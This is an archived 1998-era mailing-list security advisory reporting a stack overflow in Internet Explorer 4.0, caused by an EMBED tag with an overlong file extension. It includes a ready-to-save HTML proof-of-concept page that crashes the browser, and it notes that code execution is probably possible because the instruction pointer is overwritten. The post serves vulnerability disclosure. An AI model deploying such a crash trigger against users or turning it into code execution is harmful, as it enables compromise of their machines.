Microsoft Internet Explorer 4.0 (don't know for other versions) can be crashed and eventually made execute arbitrary code with a little help of the <EMBED> tag. The following: <EMBED SRC=file://C|/A.ABOUT_200_CHARACTERS_HERE___________________> opens a dialog box and closes IE 4.0. It seems that the long file extension causes stack overrun. The stack is smashed - full with our values, EIP is also ours and CS=SS. So probably a string could be constructed, executing code at the client's machine. Solution: Do not browse hostile pages. To try this: http://www.geocities.com/ResearchTriangle/1711/msie.html Georgi Guninski http://www.geocities.com/ResearchTriangle/1711 -----------------------cut here and save as crashmsie.html--------------------- <HTML> Trying to crash IE 4.0 <EMBED SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789> 40 80 160 170 180 190 200 </HTML>
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:46:19 PDT